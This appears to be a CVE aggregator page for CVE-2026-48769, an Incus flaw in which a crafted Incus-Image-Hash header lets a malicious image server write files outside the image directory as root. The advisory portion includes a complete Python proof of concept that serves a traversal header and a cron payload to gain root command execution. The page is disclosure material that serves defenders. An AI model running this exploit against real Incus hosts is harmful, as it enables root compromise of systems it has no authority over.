CVE-2026-48769

CRITICALPre-NVD 9.99.9
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.9 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
9.9
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.9Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Incus has an arbitrary file write on its client due to trusted image hash

Summary

An arbitrary file write exists in the Incus client when a malicious image server returns a crafted Incus-Image-Hash header. This can lead to arbitrary command execution as root on the server.

Details

  • cmd/incusd/images.go:611-684 handles source.type=url by HEADing the user-supplied URL, reading Incus-Image-Hash and Incus-Image-URL, and passing them to imageDownload() as Alias and Server.
  • cmd/incusd/daemon_images.go:91-92 defaults fp to the caller-controlled alias string.
  • cmd/incusd/daemon_images.go:333-335 builds destName := filepath.Join(destDir, fp).
  • cmd/incusd/daemon_images.go:469-523 enters the direct protocol branch, opens destName with os.Create(), and copies the HTTP response into that file.
  • cmd/incusd/daemon_images.go:528-532 validates the SHA-256 only after the file has already been created and populated.
  • cmd/incusd/daemon_images.go:337-344 cleanup only runs after the copy returns; a slow or held response extends the arbitrary-write window.

A malicious image server returning something along the following will cause the arbitrary file write.

Incus-Image-Hash: ../../../../etc/cron.d/incus-direct-image-url-rce
Incus-Image-URL: http://attacker/payload

PoC

The script below creates a malicious image server and requests an Incus server to fetch the image. File write occurs when the image is unpacked.

The following script was generated by an LLM.

#!/usr/bin/env python3
"""Direct image URL hash path traversal to transient host cron write.

For source.type=url, Incus first HEADs an attacker-controlled URL and trusts the Incus-Image-Hash header as the expected fingerprint. The direct download path then creates /var/lib/incus/images/ before validating that the hash is a real SHA-256 of the downloaded bytes. A hash containing ../ escapes the image directory.

Default mode is dry-run. With --execute-trigger this script starts a tiny HTTP server, returns a traversal hash pointing at cron, streams the cron payload, and keeps the response open so the daemon-side cleanup does not immediately remove the file.

"""

from __future__ import annotations

import argparse import http.client import json import shlex import socket import ssl import sys import threading import time import urllib.parse from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer from typing import Any

DEFAULT_SOCKET = "/var/lib/incus/unix.socket" DEFAULT_TRAVERSAL = "../../../../etc/cron.d/incus-direct-image-url-rce"

class UnixHTTPConnection(http.client.HTTPConnection): def __init__(self, socket_path: str, timeout: int = 120): super().__init__("incus", timeout=timeout) self.socket_path = socket_path

def connect(self) -> None: sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.settimeout(self.timeout) sock.connect(self.socket_path) self.sock = sock

class RCEHTTPServer(ThreadingHTTPServer): hash_path: str advertise_url: str payload: bytes hold_seconds: int payload_requested: threading.Event

class DirectImageHandler(BaseHTTPRequestHandler): protocol_version = "HTTP/1.1" server_version = "direct-image-rce/1.0"

def log_message(self, fmt: str, *args: Any) -> None: print(f"[http] {self.address_string()} - {fmt % args}", flush=True)

def do_HEAD(self) -> None: if self.path != "/stage": self.send_error(404) return

srv = self.server assert isinstance(srv, RCEHTTPServer) self.send_response(200) self.send_header("Incus-Image-Hash", srv.hash_path) self.send_header("Incus-Image-URL", srv.advertise_url.rstrip("/") + "/payload") self.send_header("Connection", "close") self.end_headers()

def do_GET(self) -> None: if self.path != "/payload": self.send_error(404) return

srv = self.server assert isinstance(srv, RCEHTTPServer) srv.payload_requested.set()

self.send_response(200) self.send_header("Content-Type", "application/octet-stream") self.send_header("Cache-Control", "no-store") self.end_headers() self.wfile.write(srv.payload) self.wfile.flush() print(f"[*] payload bytes written to daemon response; holding for {srv.hold_seconds}s", flush=True) time.sleep(srv.hold_seconds) self.close_connection = True

def quote(value: str) -> str: return urllib.parse.quote(value, safe="")

def tls_context(args: argparse.Namespace) -> ssl.SSLContext: if args.insecure: ctx = ssl._create_unverified_context() else: ctx = ssl.create_default_context(cafile=args.cacert)

if args.cert: ctx.load_cert_chain(args.cert, args.key)

return ctx

def connection(args: argparse.Namespace) -> http.client.HTTPConnection: if args.url: parsed = urllib.parse.urlparse(args.url) if parsed.scheme != "https": raise ValueError("--url must use https")

return http.client.HTTPSConnection( parsed.hostname, parsed.port or 8443, timeout=args.timeout, context=tls_context(args), )

return UnixHTTPConnection(args.socket, timeout=args.timeout)

def request_json( args: argparse.Namespace, method: str, path: str, obj: dict[str, Any] | None, allow_error: bool = False, ) -> tuple[int, dict[str, Any]]: body = None if obj is None else json.dumps(obj).encode("utf-8") headers = {"Host": "incus"} if body is not None: headers["Content-Type"] = "application/json"

conn = connection(args) conn.request(method, path, body=body, headers=headers) resp = conn.getresponse() raw = resp.read() conn.close()

try: data = json.loads(raw) if raw else {} except json.JSONDecodeError: data = {"raw": raw.decode("utf-8", "replace")}

if not allow_error and (resp.status >= 400 or data.get("type") == "error"): raise RuntimeError(f"{method} {path} failed with HTTP {resp.status}: {data}")

return resp.status, data

def images_path(project: str) -> str: return "/1.0/images?project=" + quote(project)

def cron_payload(command: str) -> bytes: return f"* * * * * root /bin/sh -c {shlex.quote(command)}\n".encode("utf-8")

def image_url_body(project_url: str, public: bool) -> dict[str, Any]: return { "source": { "type": "url", "url": project_url.rstrip("/") + "/stage", }, "public": public, }

def start_server(args: argparse.Namespace, payload: bytes) -> RCEHTTPServer: server = RCEHTTPServer((args.listen_host, args.listen_port), DirectImageHandler) server.hash_path = args.hash_path server.advertise_url = args.advertise_url server.payload = payload server.hold_seconds = args.hold_seconds server.payload_requested = threading.Event()

thread = threading.Thread(target=server.serve_forever, daemon=True) thread.start() return server

def main() -> int: parser = argparse.ArgumentParser(description="Incus direct image URL hash traversal cron RCE PoC") parser.add_argument("--socket", default=DEFAULT_SOCKET, help="Incus Unix socket") parser.add_argument("--url", help="remote Incus URL, for example https://host.ctf:8443") parser.add_argument("--cert", help="client certificate for remote Incus") parser.add_argument("--key", help="client private key for remote Incus") parser.add_argument("--cacert", help="CA certificate for remote Incus") parser.add_argument("--insecure", action="store_true", help="disable TLS verification") parser.add_argument("--timeout", type=int, default=120, help="Incus request timeout") parser.add_argument("--project", default="default", help="project used for image import") parser.add_argument("--public", action="store_true", help="mark imported image public") parser.add_argument("--listen-host", default="0.0.0.0", help="HTTP listen address") parser.add_argument("--listen-port", type=int, default=8088, help="HTTP listen port") parser.add_argument("--advertise-url", default="http://127.0.0.1:8088", help="URL reachable by the Incus daemon") parser.add_argument("--hash-path", default=DEFAULT_TRAVERSAL, help="value returned in Incus-Image-Hash") parser.add_argument("--hold-seconds", type=int, default=90, help="keep payload response open for this many seconds") parser.add_argument("--command", default="id > /tmp/incus-direct-image-url-rce", help="command cron should run") parser.add_argument("--execute-trigger", action="store_true", help="start server and trigger POST /1.0/images") parser.add_argument("--yes-i-understand-this-writes-host-file", action="store_true", help="required with --execute-trigger") args = parser.parse_args()

if bool(args.cert) != bool(args.key): parser.error("--cert and --key must be supplied together") if args.execute_trigger and not args.yes_i_understand_this_writes_host_file: parser.error("--execute-trigger requires --yes-i-understand-this-writes-host-file")

payload = cron_payload(args.command) trigger_body = image_url_body(args.advertise_url, args.public)

print("[*] exploit primitive: direct image URL unvalidated hash path host write") print(f"[*] HEAD URL served to daemon: {args.advertise_url.rstrip()}/stage") print(f"[*] returned Incus-Image-Hash: {args.hash_path}") print(f"[*] returned Incus-Image-URL: {args.advertise_url.rstrip()}/payload") print(f"[*] expected escaped host target from default Incus dir: /etc/cron.d/incus-direct-image-url-rce") print(f"[*] cron payload: {payload.decode().rstrip()}") print(f"[*] trigger body: {json.dumps(trigger_body, sort_keys=True)}")

if not args.execute_trigger: print("[*] dry run only; pass --execute-trigger and --yes-i-understand-this-writes-host-file to test") return 0

server = start_server(args, payload) print(f"[*] HTTP server listening on {args.listen_host}:{args.listen_port}")

status, data = request_json(args, "POST", images_path(args.project), trigger_body, allow_error=True) print(f"[*] POST /1.0/images HTTP {status}: {json.dumps(data, indent=2, sort_keys=True)}")

if server.payload_requested.wait(timeout=min(args.hold_seconds, 30)): print("[*] daemon requested payload; cron file should exist until the held response is released") else: print("[!] daemon did not request payload within the wait window")

print("[*] leaving HTTP server active for the remaining hold window") time.sleep(max(0, args.hold_seconds - 30)) server.shutdown() server.server_close() return 0

if __name__ == "__main__": try: raise SystemExit(main()) except BrokenPipeError: raise SystemExit(1) except Exception as exc: print(f"[-] {exc}", file=sys.stderr) raise SystemExit(1)

Impact

An arbitrary file write on the client with root privileges; possibly leading to arbitrary command execution.

CVSS v3
9.9
EG Score
9.9(low)
EPSS
KEV
Not listed

Published

June 26, 2026

Last Modified

June 26, 2026

Vendor Advisories for CVE-2026-48769(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 43× in last 7d / 65× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 06:39 UTCEG score recompute
  2. 2026-07-07 02:43 UTCEG score recompute
  3. 2026-07-06 22:49 UTCEG score recompute
  4. 2026-07-06 18:54 UTCEG score recompute
  5. 2026-07-06 14:57 UTCEG score recompute
  6. 2026-07-06 11:01 UTCEG score recompute
  7. 2026-07-06 07:01 UTCEG score recompute
  8. 2026-07-06 03:07 UTCEG score recompute
  9. 2026-07-05 23:10 UTCEG score recompute
  10. 2026-07-05 19:12 UTCEG score recompute
  11. 2026-07-05 15:18 UTCEG score recompute
  12. 2026-07-05 11:23 UTCEG score recompute
  13. 2026-07-05 07:29 UTCEG score recompute
  14. 2026-07-05 03:33 UTCEG score recompute
  15. 2026-07-04 23:37 UTCEG score recompute
  16. 2026-07-04 19:43 UTCEG score recompute
  17. 2026-07-04 15:48 UTCEG score recompute
  18. 2026-07-04 11:51 UTCEG score recompute
  19. 2026-07-04 07:57 UTCEG score recompute
  20. 2026-07-04 04:02 UTCEG score recompute
  21. 2026-07-04 00:05 UTCEG score recompute
  22. 2026-07-03 20:11 UTCEG score recompute
  23. 2026-07-03 16:15 UTCEG score recompute
  24. 2026-07-03 12:21 UTCEG score recompute
  25. 2026-07-03 08:21 UTCEG score recompute
Show 40 more
  1. 2026-07-03 04:24 UTCEG score recompute
  2. 2026-07-03 00:28 UTCEG score recompute
  3. 2026-07-02 20:35 UTCEG score recompute
  4. 2026-07-02 16:40 UTCEG score recompute
  5. 2026-07-02 12:45 UTCEG score recompute
  6. 2026-07-02 08:51 UTCEG score recompute
  7. 2026-07-02 04:56 UTCEG score recompute
  8. 2026-07-02 01:02 UTCEG score recompute
  9. 2026-07-01 21:05 UTCEG score recompute
  10. 2026-07-01 17:11 UTCEG score recompute
  11. 2026-07-01 13:16 UTCEG score recompute
  12. 2026-07-01 09:20 UTCEG score recompute
  13. 2026-07-01 05:25 UTCEG score recompute
  14. 2026-07-01 01:31 UTCEG score recompute
  15. 2026-06-30 21:36 UTCEG score recompute
  16. 2026-06-30 17:39 UTCEG score recompute
  17. 2026-06-30 13:44 UTCEG score recompute
  18. 2026-06-30 09:50 UTCEG score recompute
  19. 2026-06-30 05:54 UTCEG score recompute
  20. 2026-06-30 02:00 UTCEG score recompute
  21. 2026-06-29 22:06 UTCEG score recompute
  22. 2026-06-29 18:11 UTCEG score recompute
  23. 2026-06-29 14:08 UTCEG score recompute
  24. 2026-06-29 10:13 UTCEG score recompute
  25. 2026-06-29 06:17 UTCEG score recompute
  26. 2026-06-29 02:22 UTCEG score recompute
  27. 2026-06-28 22:28 UTCEG score recompute
  28. 2026-06-28 18:34 UTCEG score recompute
  29. 2026-06-28 14:38 UTCEG score recompute
  30. 2026-06-28 10:44 UTCEG score recompute
  31. 2026-06-28 06:49 UTCEG score recompute
  32. 2026-06-28 02:55 UTCEG score recompute
  33. 2026-06-27 23:01 UTCEG score recompute
  34. 2026-06-27 19:07 UTCEG score recompute
  35. 2026-06-27 15:13 UTCEG score recompute
  36. 2026-06-27 11:18 UTCEG score recompute
  37. 2026-06-27 07:23 UTCEG score recompute
  38. 2026-06-27 03:29 UTCEG score recompute
  39. 2026-06-26 23:31 UTCEG score recompute
  40. 2026-06-26 19:37 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-48769?
CVE-2026-48769 is a critical vulnerability published on June 26, 2026. Incus has an arbitrary file write on its client due to trusted image hash Summary An arbitrary file write exists in the Incus client when a malicious image server returns a crafted Incus-Image-Hash header. This can lead to arbitrary command execution as root on the server. Details…
When was CVE-2026-48769 disclosed?
CVE-2026-48769 was first published in the National Vulnerability Database on June 26, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-48769?
CVE-2026-48769 has a CVSS v4.0 base score of 9.9 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-48769?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-48769, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-48769

Explore →

Is Your Infrastructure Affected by CVE-2026-48769?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.